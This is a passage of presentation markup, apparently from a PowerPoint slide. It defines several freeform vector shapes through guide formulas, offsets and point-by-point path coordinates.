                  <a:gd name="T5" fmla="*/ 0 h 23"/>
                  <a:gd name="T6" fmla="*/ 0 w 34"/>
                  <a:gd name="T7" fmla="*/ 0 h 23"/>
                  <a:gd name="T8" fmla="*/ 0 w 34"/>
                  <a:gd name="T9" fmla="*/ 0 h 23"/>
                  <a:gd name="T10" fmla="*/ 0 w 34"/>
                  <a:gd name="T11" fmla="*/ 0 h 23"/>
                  <a:gd name="T12" fmla="*/ 0 w 34"/>
                  <a:gd name="T13" fmla="*/ 0 h 23"/>
                  <a:gd name="T14" fmla="*/ 0 w 34"/>
                  <a:gd name="T15" fmla="*/ 0 h 23"/>
                  <a:gd name="T16" fmla="*/ 0 w 34"/>
                  <a:gd name="T17" fmla="*/ 0 h 23"/>
                  <a:gd name="T18" fmla="*/ 0 w 34"/>
                  <a:gd name="T19" fmla="*/ 0 h 23"/>
                  <a:gd name="T20" fmla="*/ 0 w 34"/>
                  <a:gd name="T21" fmla="*/ 0 h 23"/>
                  <a:gd name="T22" fmla="*/ 0 w 34"/>
                  <a:gd name="T23" fmla="*/ 0 h 23"/>
                  <a:gd name="T24" fmla="*/ 0 w 34"/>
                  <a:gd name="T25" fmla="*/ 0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3"/>
                  <a:gd name="T41" fmla="*/ 34 w 34"/>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3">
                    <a:moveTo>
                      <a:pt x="17" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="21" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17"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175" name="Freeform 102"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="683" y="2485"/>
                <a:ext cx="46" cy="8"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 141"/>
                  <a:gd name="T1" fmla="*/ 0 h 25"/>
                  <a:gd name="T2" fmla="*/ 0 w 141"/>
                  <a:gd name="T3" fmla="*/ 0 h 25"/>
                  <a:gd name="T4" fmla="*/ 0 w 141"/>
                  <a:gd name="T5" fmla="*/ 0 h 25"/>
                  <a:gd name="T6" fmla="*/ 0 w 141"/>
                  <a:gd name="T7" fmla="*/ 0 h 25"/>
                  <a:gd name="T8" fmla="*/ 0 w 141"/>
                  <a:gd name="T9" fmla="*/ 0 h 25"/>
                  <a:gd name="T10" fmla="*/ 0 w 141"/>
                  <a:gd name="T11" fmla="*/ 0 h 25"/>
                  <a:gd name="T12" fmla="*/ 0 w 141"/>
                  <a:gd name="T13" fmla="*/ 0 h 25"/>
                  <a:gd name="T14" fmla="*/ 0 w 141"/>
                  <a:gd name="T15" fmla="*/ 0 h 25"/>
                  <a:gd name="T16" fmla="*/ 0 w 141"/>
                  <a:gd name="T17" fmla="*/ 0 h 25"/>
                  <a:gd name="T18" fmla="*/ 0 w 141"/>
                  <a:gd name="T19" fmla="*/ 0 h 25"/>
                  <a:gd name="T20" fmla="*/ 0 w 141"/>
                  <a:gd name="T21" fmla="*/ 0 h 25"/>
                  <a:gd name="T22" fmla="*/ 0 w 141"/>
                  <a:gd name="T23" fmla="*/ 0 h 25"/>
                  <a:gd name="T24" fmla="*/ 0 w 141"/>
                  <a:gd name="T25" fmla="*/ 0 h 25"/>
                  <a:gd name="T26" fmla="*/ 0 w 141"/>
                  <a:gd name="T27" fmla="*/ 0 h 25"/>
                  <a:gd name="T28" fmla="*/ 0 w 141"/>
                  <a:gd name="T29" fmla="*/ 0 h 25"/>
                  <a:gd name="T30" fmla="*/ 0 w 141"/>
                  <a:gd name="T31" fmla="*/ 0 h 25"/>
                  <a:gd name="T32" fmla="*/ 0 w 141"/>
                  <a:gd name="T33" fmla="*/ 0 h 25"/>
                  <a:gd name="T34" fmla="*/ 0 w 141"/>
                  <a:gd name="T35" fmla="*/ 0 h 25"/>
                  <a:gd name="T36" fmla="*/ 0 w 141"/>
                  <a:gd name="T37" fmla="*/ 0 h 25"/>
                  <a:gd name="T38" fmla="*/ 0 w 141"/>
                  <a:gd name="T39" fmla="*/ 0 h 25"/>
                  <a:gd name="T40" fmla="*/ 0 w 141"/>
                  <a:gd name="T41" fmla="*/ 0 h 25"/>
                  <a:gd name="T42" fmla="*/ 0 w 141"/>
                  <a:gd name="T43" fmla="*/ 0 h 25"/>
                  <a:gd name="T44" fmla="*/ 0 w 141"/>
                  <a:gd name="T45" fmla="*/ 0 h 25"/>
                  <a:gd name="T46" fmla="*/ 0 w 141"/>
                  <a:gd name="T47" fmla="*/ 0 h 25"/>
                  <a:gd name="T48" fmla="*/ 0 w 141"/>
                  <a:gd name="T49" fmla="*/ 0 h 25"/>
                  <a:gd name="T50" fmla="*/ 0 w 141"/>
                  <a:gd name="T51" fmla="*/ 0 h 25"/>
                  <a:gd name="T52" fmla="*/ 0 w 141"/>
                  <a:gd name="T53" fmla="*/ 0 h 25"/>
                  <a:gd name="T54" fmla="*/ 0 w 141"/>
                  <a:gd name="T55" fmla="*/ 0 h 25"/>
                  <a:gd name="T56" fmla="*/ 0 w 141"/>
                  <a:gd name="T57" fmla="*/ 0 h 25"/>
                  <a:gd name="T58" fmla="*/ 0 w 141"/>
                  <a:gd name="T59" fmla="*/ 0 h 25"/>
                  <a:gd name="T60" fmla="*/ 0 w 141"/>
                  <a:gd name="T61" fmla="*/ 0 h 25"/>
                  <a:gd name="T62" fmla="*/ 0 w 141"/>
                  <a:gd name="T63" fmla="*/ 0 h 25"/>
                  <a:gd name="T64" fmla="*/ 0 w 141"/>
                  <a:gd name="T65" fmla="*/ 0 h 25"/>
                  <a:gd name="T66" fmla="*/ 0 w 141"/>
                  <a:gd name="T67" fmla="*/ 0 h 25"/>
                  <a:gd name="T68" fmla="*/ 0 w 141"/>
                  <a:gd name="T69" fmla="*/ 0 h 25"/>
                  <a:gd name="T70" fmla="*/ 0 w 141"/>
                  <a:gd name="T71" fmla="*/ 0 h 25"/>
                  <a:gd name="T72" fmla="*/ 0 w 141"/>
                  <a:gd name="T73" fmla="*/ 0 h 25"/>
                  <a:gd name="T74" fmla="*/ 0 w 141"/>
                  <a:gd name="T75" fmla="*/ 0 h 25"/>
                  <a:gd name="T76" fmla="*/ 0 w 141"/>
                  <a:gd name="T77" fmla="*/ 0 h 25"/>
                  <a:gd name="T78" fmla="*/ 0 w 141"/>
                  <a:gd name="T79" fmla="*/ 0 h 25"/>
                  <a:gd name="T80" fmla="*/ 0 w 141"/>
                  <a:gd name="T81" fmla="*/ 0 h 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5"/>
                  <a:gd name="T125" fmla="*/ 141 w 141"/>
                  <a:gd name="T126" fmla="*/ 25 h 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5">
                    <a:moveTo>
                      <a:pt x="1" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="8" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="80" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="95" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="98" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="111" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="120" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="128" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="135" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="140" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="141" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="140" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="137" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="135" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="134" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="130" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="120" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="115" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="105" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="100" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="91" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1"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176" name="Freeform 103"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="642" y="2483"/>
                <a:ext cx="19" cy="10"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 58"/>
                  <a:gd name="T1" fmla="*/ 0 h 32"/>
                  <a:gd name="T2" fmla="*/ 0 w 58"/>
                  <a:gd name="T3" fmla="*/ 0 h 32"/>
                  <a:gd name="T4" fmla="*/ 0 w 58"/>
                  <a:gd name="T5" fmla="*/ 0 h 32"/>
                  <a:gd name="T6" fmla="*/ 0 w 58"/>
                  <a:gd name="T7" fmla="*/ 0 h 32"/>
                  <a:gd name="T8" fmla="*/ 0 w 58"/>
                  <a:gd name="T9" fmla="*/ 0 h 32"/>
                  <a:gd name="T10" fmla="*/ 0 w 58"/>
                  <a:gd name="T11" fmla="*/ 0 h 32"/>
                  <a:gd name="T12" fmla="*/ 0 w 58"/>
                  <a:gd name="T13" fmla="*/ 0 h 32"/>
                  <a:gd name="T14" fmla="*/ 0 w 58"/>
                  <a:gd name="T15" fmla="*/ 0 h 32"/>
                  <a:gd name="T16" fmla="*/ 0 w 58"/>
                  <a:gd name="T17" fmla="*/ 0 h 32"/>
                  <a:gd name="T18" fmla="*/ 0 w 58"/>
                  <a:gd name="T19" fmla="*/ 0 h 32"/>
                  <a:gd name="T20" fmla="*/ 0 w 58"/>
                  <a:gd name="T21" fmla="*/ 0 h 32"/>
                  <a:gd name="T22" fmla="*/ 0 w 58"/>
                  <a:gd name="T23" fmla="*/ 0 h 32"/>
                  <a:gd name="T24" fmla="*/ 0 w 58"/>
                  <a:gd name="T25" fmla="*/ 0 h 32"/>
                  <a:gd name="T26" fmla="*/ 0 w 58"/>
                  <a:gd name="T27" fmla="*/ 0 h 32"/>
                  <a:gd name="T28" fmla="*/ 0 w 58"/>
                  <a:gd name="T29" fmla="*/ 0 h 32"/>
                  <a:gd name="T30" fmla="*/ 0 w 58"/>
                  <a:gd name="T31" fmla="*/ 0 h 32"/>
                  <a:gd name="T32" fmla="*/ 0 w 58"/>
                  <a:gd name="T33" fmla="*/ 0 h 32"/>
                  <a:gd name="T34" fmla="*/ 0 w 58"/>
                  <a:gd name="T35" fmla="*/ 0 h 32"/>
                  <a:gd name="T36" fmla="*/ 0 w 58"/>
                  <a:gd name="T37" fmla="*/ 0 h 32"/>
                  <a:gd name="T38" fmla="*/ 0 w 58"/>
                  <a:gd name="T39" fmla="*/ 0 h 32"/>
                  <a:gd name="T40" fmla="*/ 0 w 58"/>
                  <a:gd name="T41" fmla="*/ 0 h 32"/>
                  <a:gd name="T42" fmla="*/ 0 w 58"/>
                  <a:gd name="T43" fmla="*/ 0 h 32"/>
                  <a:gd name="T44" fmla="*/ 0 w 58"/>
                  <a:gd name="T45" fmla="*/ 0 h 32"/>
                  <a:gd name="T46" fmla="*/ 0 w 58"/>
                  <a:gd name="T47" fmla="*/ 0 h 32"/>
                  <a:gd name="T48" fmla="*/ 0 w 58"/>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32"/>
                  <a:gd name="T77" fmla="*/ 58 w 58"/>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32">
                    <a:moveTo>
                      <a:pt x="3" y="10"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="7" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="1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177" name="Freeform 104"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="620" y="2484"/>
                <a:ext cx="12" cy="14"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 39"/>
                  <a:gd name="T1" fmla="*/ 0 h 41"/>
                  <a:gd name="T2" fmla="*/ 0 w 39"/>
                  <a:gd name="T3" fmla="*/ 0 h 41"/>
                  <a:gd name="T4" fmla="*/ 0 w 39"/>
                  <a:gd name="T5" fmla="*/ 0 h 41"/>
                  <a:gd name="T6" fmla="*/ 0 w 39"/>
                  <a:gd name="T7" fmla="*/ 0 h 41"/>
                  <a:gd name="T8" fmla="*/ 0 w 39"/>
                  <a:gd name="T9" fmla="*/ 0 h 41"/>
                  <a:gd name="T10" fmla="*/ 0 w 39"/>
                  <a:gd name="T11" fmla="*/ 0 h 41"/>
                  <a:gd name="T12" fmla="*/ 0 w 39"/>
                  <a:gd name="T13" fmla="*/ 0 h 41"/>
                  <a:gd name="T14" fmla="*/ 0 w 39"/>
                  <a:gd name="T15" fmla="*/ 0 h 41"/>
                  <a:gd name="T16" fmla="*/ 0 w 39"/>
                  <a:gd name="T17" fmla="*/ 0 h 41"/>
                  <a:gd name="T18" fmla="*/ 0 w 39"/>
                  <a:gd name="T19" fmla="*/ 0 h 41"/>
                  <a:gd name="T20" fmla="*/ 0 w 39"/>
                  <a:gd name="T21" fmla="*/ 0 h 41"/>
                  <a:gd name="T22" fmla="*/ 0 w 39"/>
                  <a:gd name="T23" fmla="*/ 0 h 41"/>
                  <a:gd name="T24" fmla="*/ 0 w 39"/>
                  <a:gd name="T25" fmla="*/ 0 h 41"/>
                  <a:gd name="T26" fmla="*/ 0 w 39"/>
                  <a:gd name="T27" fmla="*/ 0 h 41"/>
                  <a:gd name="T28" fmla="*/ 0 w 39"/>
                  <a:gd name="T29" fmla="*/ 0 h 41"/>
                  <a:gd name="T30" fmla="*/ 0 w 39"/>
                  <a:gd name="T31" fmla="*/ 0 h 41"/>
                  <a:gd name="T32" fmla="*/ 0 w 39"/>
                  <a:gd name="T33" fmla="*/ 0 h 41"/>
                  <a:gd name="T34" fmla="*/ 0 w 39"/>
                  <a:gd name="T35" fmla="*/ 0 h 41"/>
                  <a:gd name="T36" fmla="*/ 0 w 39"/>
                  <a:gd name="T37" fmla="*/ 0 h 41"/>
                  <a:gd name="T38" fmla="*/ 0 w 39"/>
                  <a:gd name="T39" fmla="*/ 0 h 41"/>
                  <a:gd name="T40" fmla="*/ 0 w 39"/>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41"/>
                  <a:gd name="T65" fmla="*/ 39 w 39"/>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41">
                    <a:moveTo>
                      <a:pt x="0" y="36"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="5" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="36"/>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178" name="Freeform 105"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="604" y="2491"/>
                <a:ext cx="39" cy="26"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 118"/>
                  <a:gd name="T1" fmla="*/ 0 h 83"/>
                  <a:gd name="T2" fmla="*/ 0 w 118"/>
                  <a:gd name="T3" fmla="*/ 0 h 83"/>
                  <a:gd name="T4" fmla="*/ 0 w 118"/>
                  <a:gd name="T5" fmla="*/ 0 h 83"/>
                  <a:gd name="T6" fmla="*/ 0 w 118"/>
                  <a:gd name="T7" fmla="*/ 0 h 83"/>
                  <a:gd name="T8" fmla="*/ 0 w 118"/>
                  <a:gd name="T9" fmla="*/ 0 h 83"/>
                  <a:gd name="T10" fmla="*/ 0 w 118"/>
                  <a:gd name="T11" fmla="*/ 0 h 83"/>
                  <a:gd name="T12" fmla="*/ 0 w 118"/>
                  <a:gd name="T13" fmla="*/ 0 h 83"/>
                  <a:gd name="T14" fmla="*/ 0 w 118"/>
                  <a:gd name="T15" fmla="*/ 0 h 83"/>
                  <a:gd name="T16" fmla="*/ 0 w 118"/>
                  <a:gd name="T17" fmla="*/ 0 h 83"/>
                  <a:gd name="T18" fmla="*/ 0 w 118"/>
                  <a:gd name="T19" fmla="*/ 0 h 83"/>
                  <a:gd name="T20" fmla="*/ 0 w 118"/>
                  <a:gd name="T21" fmla="*/ 0 h 83"/>
                  <a:gd name="T22" fmla="*/ 0 w 118"/>
                  <a:gd name="T23" fmla="*/ 0 h 83"/>
                  <a:gd name="T24" fmla="*/ 0 w 118"/>
                  <a:gd name="T25" fmla="*/ 0 h 83"/>
                  <a:gd name="T26" fmla="*/ 0 w 118"/>
                  <a:gd name="T27" fmla="*/ 0 h 83"/>
                  <a:gd name="T28" fmla="*/ 0 w 118"/>
                  <a:gd name="T29" fmla="*/ 0 h 83"/>
                  <a:gd name="T30" fmla="*/ 0 w 118"/>
                  <a:gd name="T31" fmla="*/ 0 h 83"/>
                  <a:gd name="T32" fmla="*/ 0 w 118"/>
                  <a:gd name="T33" fmla="*/ 0 h 83"/>
                  <a:gd name="T34" fmla="*/ 0 w 118"/>
                  <a:gd name="T35" fmla="*/ 0 h 83"/>
                  <a:gd name="T36" fmla="*/ 0 w 118"/>
                  <a:gd name="T37" fmla="*/ 0 h 83"/>
                  <a:gd name="T38" fmla="*/ 0 w 118"/>
                  <a:gd name="T39" fmla="*/ 0 h 83"/>
                  <a:gd name="T40" fmla="*/ 0 w 118"/>
                  <a:gd name="T41" fmla="*/ 0 h 83"/>
                  <a:gd name="T42" fmla="*/ 0 w 118"/>
                  <a:gd name="T43" fmla="*/ 0 h 83"/>
                  <a:gd name="T44" fmla="*/ 0 w 118"/>
                  <a:gd name="T45" fmla="*/ 0 h 83"/>
                  <a:gd name="T46" fmla="*/ 0 w 118"/>
                  <a:gd name="T47" fmla="*/ 0 h 83"/>
                  <a:gd name="T48" fmla="*/ 0 w 118"/>
                  <a:gd name="T49" fmla="*/ 0 h 83"/>
                  <a:gd name="T50" fmla="*/ 0 w 118"/>
                  <a:gd name="T51" fmla="*/ 0 h 83"/>
                  <a:gd name="T52" fmla="*/ 0 w 118"/>
                  <a:gd name="T53" fmla="*/ 0 h 83"/>
                  <a:gd name="T54" fmla="*/ 0 w 118"/>
                  <a:gd name="T55" fmla="*/ 0 h 83"/>
                  <a:gd name="T56" fmla="*/ 0 w 118"/>
                  <a:gd name="T57" fmla="*/ 0 h 83"/>
                  <a:gd name="T58" fmla="*/ 0 w 118"/>
                  <a:gd name="T59" fmla="*/ 0 h 83"/>
                  <a:gd name="T60" fmla="*/ 0 w 118"/>
                  <a:gd name="T61" fmla="*/ 0 h 83"/>
                  <a:gd name="T62" fmla="*/ 0 w 118"/>
                  <a:gd name="T63" fmla="*/ 0 h 83"/>
                  <a:gd name="T64" fmla="*/ 0 w 118"/>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83"/>
                  <a:gd name="T101" fmla="*/ 118 w 118"/>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83">
                    <a:moveTo>
                      <a:pt x="3" y="75"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="9" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="102" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="109" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="118" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="118" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="117" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="115" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="111" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="101" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="85" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="75" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="83"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="82"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="75"/>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179" name="Freeform 106"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="482" y="2551"/>
                <a:ext cx="61" cy="24"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 188"/>
                  <a:gd name="T1" fmla="*/ 0 h 71"/>
                  <a:gd name="T2" fmla="*/ 0 w 188"/>
                  <a:gd name="T3" fmla="*/ 0 h 71"/>
                  <a:gd name="T4" fmla="*/ 0 w 188"/>
                  <a:gd name="T5" fmla="*/ 0 h 71"/>
                  <a:gd name="T6" fmla="*/ 0 w 188"/>
                  <a:gd name="T7" fmla="*/ 0 h 71"/>
                  <a:gd name="T8" fmla="*/ 0 w 188"/>
                  <a:gd name="T9" fmla="*/ 0 h 71"/>
                  <a:gd name="T10" fmla="*/ 0 w 188"/>
                  <a:gd name="T11" fmla="*/ 0 h 71"/>
                  <a:gd name="T12" fmla="*/ 0 w 188"/>
                  <a:gd name="T13" fmla="*/ 0 h 71"/>
                  <a:gd name="T14" fmla="*/ 0 w 188"/>
                  <a:gd name="T15" fmla="*/ 0 h 71"/>
                  <a:gd name="T16" fmla="*/ 0 w 188"/>
                  <a:gd name="T17" fmla="*/ 0 h 71"/>
                  <a:gd name="T18" fmla="*/ 0 w 188"/>
                  <a:gd name="T19" fmla="*/ 0 h 71"/>
                  <a:gd name="T20" fmla="*/ 0 w 188"/>
                  <a:gd name="T21" fmla="*/ 0 h 71"/>
                  <a:gd name="T22" fmla="*/ 0 w 188"/>
                  <a:gd name="T23" fmla="*/ 0 h 71"/>
                  <a:gd name="T24" fmla="*/ 0 w 188"/>
                  <a:gd name="T25" fmla="*/ 0 h 71"/>
                  <a:gd name="T26" fmla="*/ 0 w 188"/>
                  <a:gd name="T27" fmla="*/ 0 h 71"/>
                  <a:gd name="T28" fmla="*/ 0 w 188"/>
                  <a:gd name="T29" fmla="*/ 0 h 71"/>
                  <a:gd name="T30" fmla="*/ 0 w 188"/>
                  <a:gd name="T31" fmla="*/ 0 h 71"/>
                  <a:gd name="T32" fmla="*/ 0 w 188"/>
                  <a:gd name="T33" fmla="*/ 0 h 71"/>
                  <a:gd name="T34" fmla="*/ 0 w 188"/>
                  <a:gd name="T35" fmla="*/ 0 h 71"/>
                  <a:gd name="T36" fmla="*/ 0 w 188"/>
                  <a:gd name="T37" fmla="*/ 0 h 71"/>
                  <a:gd name="T38" fmla="*/ 0 w 188"/>
                  <a:gd name="T39" fmla="*/ 0 h 71"/>
                  <a:gd name="T40" fmla="*/ 0 w 188"/>
